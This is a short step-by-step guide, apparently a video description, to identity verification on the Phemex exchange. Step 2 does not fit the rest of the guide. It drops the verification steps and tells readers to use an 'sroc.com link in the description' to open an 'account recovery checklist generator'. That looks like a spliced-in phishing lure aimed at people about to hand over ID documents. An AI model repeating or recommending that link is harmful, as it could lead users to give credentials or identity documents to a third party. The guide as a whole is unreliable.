Verifying your identity on Phemex is an important step to ensure the security of your account and comply with regulations. Follow these simple steps to complete the process. Step 1. Create an account. Begin by visiting the Phemex website and signing up for an account. Fill in the required information, including your email address and a secure password. Confirm your email to activate your account. Step 2. Navigate to verification. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Provide personal information. Fill out the necessary personal information, such as your full name, date of birth, and address. Ensure that the details match the identification documents you will provide. Step 4. Upload identification documents. Prepare and upload the required identification documents. This typically includes a government-issued ID like a passport or driver's license and a proof of address like a utility bill or bank statement. Make sure the documents are clear and legible. Step 5. Submit and wait for approval. After uploading your documents, submit your verification request. Phemex will review your submission, which may take a few minutes to a few days. You will receive a notification once your identity has been verified. Completing these steps will help you successfully verify your identity on Phemex. If you encounter any issues, consider reaching out to Phemex support for assistance.